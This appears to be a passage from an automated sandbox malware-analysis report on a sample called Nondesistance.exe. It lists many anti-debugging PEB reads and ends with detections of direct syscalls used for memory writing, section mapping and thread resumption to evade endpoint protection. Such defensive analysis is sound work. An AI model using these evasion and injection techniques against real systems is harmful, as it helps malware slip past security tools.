        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_32583608 mov eax, dword ptr fs:[00000030h]9_2_32583608
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_32583608 mov eax, dword ptr fs:[00000030h]9_2_32583608
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_3251D600 mov eax, dword ptr fs:[00000030h]9_2_3251D600
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_3251D600 mov eax, dword ptr fs:[00000030h]9_2_3251D600
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_325C4600 mov eax, dword ptr fs:[00000030h]9_2_325C4600
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_325AF607 mov eax, dword ptr fs:[00000030h]9_2_325AF607
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_3252360F mov eax, dword ptr fs:[00000030h]9_2_3252360F
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_32520630 mov eax, dword ptr fs:[00000030h]9_2_32520630
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_32578633 mov esi, dword ptr fs:[00000030h]9_2_32578633
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_32578633 mov eax, dword ptr fs:[00000030h]9_2_32578633
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_32578633 mov eax, dword ptr fs:[00000030h]9_2_32578633
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_324F7623 mov eax, dword ptr fs:[00000030h]9_2_324F7623
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_324F5622 mov eax, dword ptr fs:[00000030h]9_2_324F5622
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_324F5622 mov eax, dword ptr fs:[00000030h]9_2_324F5622
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_3259D62C mov ecx, dword ptr fs:[00000030h]9_2_3259D62C
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_3259D62C mov ecx, dword ptr fs:[00000030h]9_2_3259D62C
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_3259D62C mov eax, dword ptr fs:[00000030h]9_2_3259D62C
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_324F0630 mov eax, dword ptr fs:[00000030h]9_2_324F0630
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_324F06CF mov eax, dword ptr fs:[00000030h]9_2_324F06CF
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_3251D6D0 mov eax, dword ptr fs:[00000030h]9_2_3251D6D0
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_325BA6C0 mov eax, dword ptr fs:[00000030h]9_2_325BA6C0
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_325986C2 mov eax, dword ptr fs:[00000030h]9_2_325986C2
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_3256C6F2 mov eax, dword ptr fs:[00000030h]9_2_3256C6F2
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_3256C6F2 mov eax, dword ptr fs:[00000030h]9_2_3256C6F2
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_324E96E0 mov eax, dword ptr fs:[00000030h]9_2_324E96E0
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_324E96E0 mov eax, dword ptr fs:[00000030h]9_2_324E96E0
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_324FC6E0 mov eax, dword ptr fs:[00000030h]9_2_324FC6E0
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_324F56E0 mov eax, dword ptr fs:[00000030h]9_2_324F56E0
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_324F56E0 mov eax, dword ptr fs:[00000030h]9_2_324F56E0
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_324F56E0 mov eax, dword ptr fs:[00000030h]9_2_324F56E0
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_325166E0 mov eax, dword ptr fs:[00000030h]9_2_325166E0
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_325166E0 mov eax, dword ptr fs:[00000030h]9_2_325166E0
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_3257C691 mov eax, dword ptr fs:[00000030h]9_2_3257C691
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_32500680 mov eax, dword ptr fs:[00000030h]9_2_32500680
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_32500680 mov eax, dword ptr fs:[00000030h]9_2_32500680
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_32500680 mov eax, dword ptr fs:[00000030h]9_2_32500680
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_32500680 mov eax, dword ptr fs:[00000030h]9_2_32500680
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_32500680 mov eax, dword ptr fs:[00000030h]9_2_32500680
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_32500680 mov eax, dword ptr fs:[00000030h]9_2_32500680
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_32500680 mov eax, dword ptr fs:[00000030h]9_2_32500680
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_32500680 mov eax, dword ptr fs:[00000030h]9_2_32500680
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_32500680 mov eax, dword ptr fs:[00000030h]9_2_32500680
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_32500680 mov eax, dword ptr fs:[00000030h]9_2_32500680
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_32500680 mov eax, dword ptr fs:[00000030h]9_2_32500680
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_32500680 mov eax, dword ptr fs:[00000030h]9_2_32500680
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_325AF68C mov eax, dword ptr fs:[00000030h]9_2_325AF68C
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_324F8690 mov eax, dword ptr fs:[00000030h]9_2_324F8690
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_325B86A8 mov eax, dword ptr fs:[00000030h]9_2_325B86A8
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_325B86A8 mov eax, dword ptr fs:[00000030h]9_2_325B86A8
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_3252A750 mov eax, dword ptr fs:[00000030h]9_2_3252A750
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_32512755 mov eax, dword ptr fs:[00000030h]9_2_32512755
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_32512755 mov eax, dword ptr fs:[00000030h]9_2_32512755
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_32512755 mov eax, dword ptr fs:[00000030h]9_2_32512755
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_32512755 mov ecx, dword ptr fs:[00000030h]9_2_32512755
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_32512755 mov eax, dword ptr fs:[00000030h]9_2_32512755
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_32512755 mov eax, dword ptr fs:[00000030h]9_2_32512755
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_3259E750 mov eax, dword ptr fs:[00000030h]9_2_3259E750
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_32523740 mov eax, dword ptr fs:[00000030h]9_2_32523740
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_324EF75B mov eax, dword ptr fs:[00000030h]9_2_324EF75B
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_324EF75B mov eax, dword ptr fs:[00000030h]9_2_324EF75B
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_324EF75B mov eax, dword ptr fs:[00000030h]9_2_324EF75B
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_324EF75B mov eax, dword ptr fs:[00000030h]9_2_324EF75B
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_324EF75B mov eax, dword ptr fs:[00000030h]9_2_324EF75B
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_324EF75B mov eax, dword ptr fs:[00000030h]9_2_324EF75B
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_324EF75B mov eax, dword ptr fs:[00000030h]9_2_324EF75B
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_324EF75B mov eax, dword ptr fs:[00000030h]9_2_324EF75B
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_324EF75B mov eax, dword ptr fs:[00000030h]9_2_324EF75B
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_3252174A mov eax, dword ptr fs:[00000030h]9_2_3252174A
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_32520774 mov eax, dword ptr fs:[00000030h]9_2_32520774
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_32502760 mov ecx, dword ptr fs:[00000030h]9_2_32502760
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_32531763 mov eax, dword ptr fs:[00000030h]9_2_32531763
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_32531763 mov eax, dword ptr fs:[00000030h]9_2_32531763
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_32531763 mov eax, dword ptr fs:[00000030h]9_2_32531763
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_32531763 mov eax, dword ptr fs:[00000030h]9_2_32531763
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_32531763 mov eax, dword ptr fs:[00000030h]9_2_32531763
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_32531763 mov eax, dword ptr fs:[00000030h]9_2_32531763
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_324F4779 mov eax, dword ptr fs:[00000030h]9_2_324F4779
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_324F4779 mov eax, dword ptr fs:[00000030h]9_2_324F4779
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_324EB705 mov eax, dword ptr fs:[00000030h]9_2_324EB705
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_324EB705 mov eax, dword ptr fs:[00000030h]9_2_324EB705
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_324EB705 mov eax, dword ptr fs:[00000030h]9_2_324EB705
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_324EB705 mov eax, dword ptr fs:[00000030h]9_2_324EB705
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_325AF717 mov eax, dword ptr fs:[00000030h]9_2_325AF717
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_324FD700 mov ecx, dword ptr fs:[00000030h]9_2_324FD700
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_325B970B mov eax, dword ptr fs:[00000030h]9_2_325B970B
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_325B970B mov eax, dword ptr fs:[00000030h]9_2_325B970B
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_324F471B mov eax, dword ptr fs:[00000030h]9_2_324F471B
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_324F471B mov eax, dword ptr fs:[00000030h]9_2_324F471B
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_3251270D mov eax, dword ptr fs:[00000030h]9_2_3251270D
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_3251270D mov eax, dword ptr fs:[00000030h]9_2_3251270D
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_3251270D mov eax, dword ptr fs:[00000030h]9_2_3251270D
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_32519723 mov eax, dword ptr fs:[00000030h]9_2_32519723
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_325AF7CF mov eax, dword ptr fs:[00000030h]9_2_325AF7CF
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_324F37E4 mov eax, dword ptr fs:[00000030h]9_2_324F37E4
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_324F37E4 mov eax, dword ptr fs:[00000030h]9_2_324F37E4
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_324F37E4 mov eax, dword ptr fs:[00000030h]9_2_324F37E4
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_324F37E4 mov eax, dword ptr fs:[00000030h]9_2_324F37E4
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_324F37E4 mov eax, dword ptr fs:[00000030h]9_2_324F37E4
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_324F37E4 mov eax, dword ptr fs:[00000030h]9_2_324F37E4
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_324F37E4 mov eax, dword ptr fs:[00000030h]9_2_324F37E4
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_3251E7E0 mov eax, dword ptr fs:[00000030h]9_2_3251E7E0
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_324F77F9 mov eax, dword ptr fs:[00000030h]9_2_324F77F9
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_324F77F9 mov eax, dword ptr fs:[00000030h]9_2_324F77F9
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_32521796 mov eax, dword ptr fs:[00000030h]9_2_32521796
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_32521796 mov eax, dword ptr fs:[00000030h]9_2_32521796
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_3256E79D mov eax, dword ptr fs:[00000030h]9_2_3256E79D
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_3256E79D mov eax, dword ptr fs:[00000030h]9_2_3256E79D
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_3256E79D mov eax, dword ptr fs:[00000030h]9_2_3256E79D
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_3256E79D mov eax, dword ptr fs:[00000030h]9_2_3256E79D
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_3256E79D mov eax, dword ptr fs:[00000030h]9_2_3256E79D
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_3256E79D mov eax, dword ptr fs:[00000030h]9_2_3256E79D
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_3256E79D mov eax, dword ptr fs:[00000030h]9_2_3256E79D
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_3256E79D mov eax, dword ptr fs:[00000030h]9_2_3256E79D
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_3256E79D mov eax, dword ptr fs:[00000030h]9_2_3256E79D
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_325CB781 mov eax, dword ptr fs:[00000030h]9_2_325CB781
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_325CB781 mov eax, dword ptr fs:[00000030h]9_2_325CB781
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_325C17BC mov eax, dword ptr fs:[00000030h]9_2_325C17BC
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_325BD7A7 mov eax, dword ptr fs:[00000030h]9_2_325BD7A7
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_325BD7A7 mov eax, dword ptr fs:[00000030h]9_2_325BD7A7
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_325BD7A7 mov eax, dword ptr fs:[00000030h]9_2_325BD7A7
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_3252D450 mov eax, dword ptr fs:[00000030h]9_2_3252D450
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_3252D450 mov eax, dword ptr fs:[00000030h]9_2_3252D450
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_3251E45E mov eax, dword ptr fs:[00000030h]9_2_3251E45E
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_3251E45E mov eax, dword ptr fs:[00000030h]9_2_3251E45E
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_3251E45E mov eax, dword ptr fs:[00000030h]9_2_3251E45E
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_3251E45E mov eax, dword ptr fs:[00000030h]9_2_3251E45E
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_3251E45E mov eax, dword ptr fs:[00000030h]9_2_3251E45E
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_32500445 mov eax, dword ptr fs:[00000030h]9_2_32500445
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_32500445 mov eax, dword ptr fs:[00000030h]9_2_32500445
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_32500445 mov eax, dword ptr fs:[00000030h]9_2_32500445
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_32500445 mov eax, dword ptr fs:[00000030h]9_2_32500445
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_32500445 mov eax, dword ptr fs:[00000030h]9_2_32500445
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_32500445 mov eax, dword ptr fs:[00000030h]9_2_32500445
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_324FD454 mov eax, dword ptr fs:[00000030h]9_2_324FD454
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_324FD454 mov eax, dword ptr fs:[00000030h]9_2_324FD454
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_324FD454 mov eax, dword ptr fs:[00000030h]9_2_324FD454
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_324FD454 mov eax, dword ptr fs:[00000030h]9_2_324FD454
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_324FD454 mov eax, dword ptr fs:[00000030h]9_2_324FD454
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_324FD454 mov eax, dword ptr fs:[00000030h]9_2_324FD454
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_325AF478 mov eax, dword ptr fs:[00000030h]9_2_325AF478
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_324F8470 mov eax, dword ptr fs:[00000030h]9_2_324F8470
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_324F8470 mov eax, dword ptr fs:[00000030h]9_2_324F8470
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_325BA464 mov eax, dword ptr fs:[00000030h]9_2_325BA464
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_324E640D mov eax, dword ptr fs:[00000030h]9_2_324E640D
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_325AF409 mov eax, dword ptr fs:[00000030h]9_2_325AF409
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_32586400 mov eax, dword ptr fs:[00000030h]9_2_32586400
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_32586400 mov eax, dword ptr fs:[00000030h]9_2_32586400
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_324EB420 mov eax, dword ptr fs:[00000030h]9_2_324EB420
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_32527425 mov eax, dword ptr fs:[00000030h]9_2_32527425
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_32527425 mov ecx, dword ptr fs:[00000030h]9_2_32527425
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_3257F42F mov eax, dword ptr fs:[00000030h]9_2_3257F42F
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_3257F42F mov eax, dword ptr fs:[00000030h]9_2_3257F42F
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_3257F42F mov eax, dword ptr fs:[00000030h]9_2_3257F42F
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_3257F42F mov eax, dword ptr fs:[00000030h]9_2_3257F42F
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_3257F42F mov eax, dword ptr fs:[00000030h]9_2_3257F42F
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_32579429 mov eax, dword ptr fs:[00000030h]9_2_32579429
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_325144D1 mov eax, dword ptr fs:[00000030h]9_2_325144D1
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_325144D1 mov eax, dword ptr fs:[00000030h]9_2_325144D1
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_3251F4D0 mov eax, dword ptr fs:[00000030h]9_2_3251F4D0
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_3251F4D0 mov eax, dword ptr fs:[00000030h]9_2_3251F4D0
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_3251F4D0 mov eax, dword ptr fs:[00000030h]9_2_3251F4D0
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_3251F4D0 mov eax, dword ptr fs:[00000030h]9_2_3251F4D0
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_3251F4D0 mov eax, dword ptr fs:[00000030h]9_2_3251F4D0
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_3251F4D0 mov eax, dword ptr fs:[00000030h]9_2_3251F4D0
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_3251F4D0 mov eax, dword ptr fs:[00000030h]9_2_3251F4D0
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_3251F4D0 mov eax, dword ptr fs:[00000030h]9_2_3251F4D0
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_3251F4D0 mov eax, dword ptr fs:[00000030h]9_2_3251F4D0
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_325114C9 mov eax, dword ptr fs:[00000030h]9_2_325114C9
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_325114C9 mov eax, dword ptr fs:[00000030h]9_2_325114C9
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_325114C9 mov eax, dword ptr fs:[00000030h]9_2_325114C9
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_325114C9 mov eax, dword ptr fs:[00000030h]9_2_325114C9
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_325114C9 mov eax, dword ptr fs:[00000030h]9_2_325114C9
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_3252A4F0 mov eax, dword ptr fs:[00000030h]9_2_3252A4F0
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_3252A4F0 mov eax, dword ptr fs:[00000030h]9_2_3252A4F0
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_325AF4FD mov eax, dword ptr fs:[00000030h]9_2_325AF4FD
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_325194FA mov eax, dword ptr fs:[00000030h]9_2_325194FA
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_325254E0 mov eax, dword ptr fs:[00000030h]9_2_325254E0
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_3252E4EF mov eax, dword ptr fs:[00000030h]9_2_3252E4EF
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_3252E4EF mov eax, dword ptr fs:[00000030h]9_2_3252E4EF
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_324F64F0 mov eax, dword ptr fs:[00000030h]9_2_324F64F0
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_3252B490 mov eax, dword ptr fs:[00000030h]9_2_3252B490
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_3252B490 mov eax, dword ptr fs:[00000030h]9_2_3252B490
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_3257C490 mov eax, dword ptr fs:[00000030h]9_2_3257C490
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_324F0485 mov ecx, dword ptr fs:[00000030h]9_2_324F0485
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_3252648A mov eax, dword ptr fs:[00000030h]9_2_3252648A
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_3252648A mov eax, dword ptr fs:[00000030h]9_2_3252648A
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_3252648A mov eax, dword ptr fs:[00000030h]9_2_3252648A
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_324F24A2 mov eax, dword ptr fs:[00000030h]9_2_324F24A2
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_324F24A2 mov ecx, dword ptr fs:[00000030h]9_2_324F24A2
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_3252E4BC mov eax, dword ptr fs:[00000030h]9_2_3252E4BC
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_3257D4A0 mov ecx, dword ptr fs:[00000030h]9_2_3257D4A0
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_3257D4A0 mov eax, dword ptr fs:[00000030h]9_2_3257D4A0
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_3257D4A0 mov eax, dword ptr fs:[00000030h]9_2_3257D4A0
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_325244A8 mov eax, dword ptr fs:[00000030h]9_2_325244A8
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_325CB55F mov eax, dword ptr fs:[00000030h]9_2_325CB55F
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_325CB55F mov eax, dword ptr fs:[00000030h]9_2_325CB55F
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_324F254C mov eax, dword ptr fs:[00000030h]9_2_324F254C

        HIPS / PFW / Operating System Protection Evasion

        barindex
        Found direct / indirect Syscall (likely to bypass EDR)
        Source: C:\Program Files (x86)\qUiDoputyglQzVYibDRasYiPLhrIcQavufTxYIuNXmAUmzqYssSJmsSX\jbBlvVPHmIIgIHiOBCnstGcDCWhN.exeNtReadFile: Direct from: 0x77A929FCJump to behavior
        Source: C:\Program Files (x86)\qUiDoputyglQzVYibDRasYiPLhrIcQavufTxYIuNXmAUmzqYssSJmsSX\jbBlvVPHmIIgIHiOBCnstGcDCWhN.exeNtQuerySystemInformation: Direct from: 0x77A92D1CJump to behavior
        Source: C:\Program Files (x86)\qUiDoputyglQzVYibDRasYiPLhrIcQavufTxYIuNXmAUmzqYssSJmsSX\jbBlvVPHmIIgIHiOBCnstGcDCWhN.exeNtProtectVirtualMemory: Direct from: 0x77A87A4EJump to behavior
        Source: C:\Program Files (x86)\qUiDoputyglQzVYibDRasYiPLhrIcQavufTxYIuNXmAUmzqYssSJmsSX\jbBlvVPHmIIgIHiOBCnstGcDCWhN.exeNtMapViewOfSection: Direct from: 0x77A92C3CJump to behavior
        Source: C:\Program Files (x86)\qUiDoputyglQzVYibDRasYiPLhrIcQavufTxYIuNXmAUmzqYssSJmsSX\jbBlvVPHmIIgIHiOBCnstGcDCWhN.exeNtWriteVirtualMemory: Direct from: 0x77A92D5CJump to behavior
        Source: C:\Program Files (x86)\qUiDoputyglQzVYibDRasYiPLhrIcQavufTxYIuNXmAUmzqYssSJmsSX\jbBlvVPHmIIgIHiOBCnstGcDCWhN.exeNtResumeThread: Direct from: 0x77A935CCJump to behavior
        Source: C:\Program Files (x86)\qUiDoputyglQzVYibDRasYiPLhrIcQavufTxYIuNXmAUmzqYssSJmsSX\jbBlvVPHmIIgIHiOBCnstGcDCWhN.exeNtAllocateVirtualMemory: Direct from: 0x77A92B1CJump to behavior
        Source: C:\Program Files (x86)\qUiDoputyglQzVYibDRasYiPLhrIcQavufTxYIuNXmAUmzqYssSJmsSX\jbBlvVPHmIIgIHiOBCnstGcDCWhN.exeNtSetInformationProcess: Direct from: 0x77A92B7CJump to behavior
        Source: C:\Program Files (x86)\qUiDoputyglQzVYibDRasYiPLhrIcQavufTxYIuNXmAUmzqYssSJmsSX\jbBlvVPHmIIgIHiOBCnstGcDCWhN.exeNtNotifyChangeKey: Direct from: 0x77A93B4CJump to behavior
        Source: C:\Program Files (x86)\qUiDoputyglQzVYibDRasYiPLhrIcQavufTxYIuNXmAUmzqYssSJmsSX\jbBlvVPHmIIgIHiOBCnstGcDCWhN.exeNtReadVirtualMemory: Direct from: 0x77A92DACJump to behavior
        Source: C:\Program Files (x86)\qUiDoputyglQzVYibDRasYiPLhrIcQavufTxYIuNXmAUmzqYssSJmsSX\jbBlvVPHmIIgIHiOBCnstGcDCWhN.exeNtAllocateVirtualMemory: Direct from: 0x77A93BBCJump to behavior
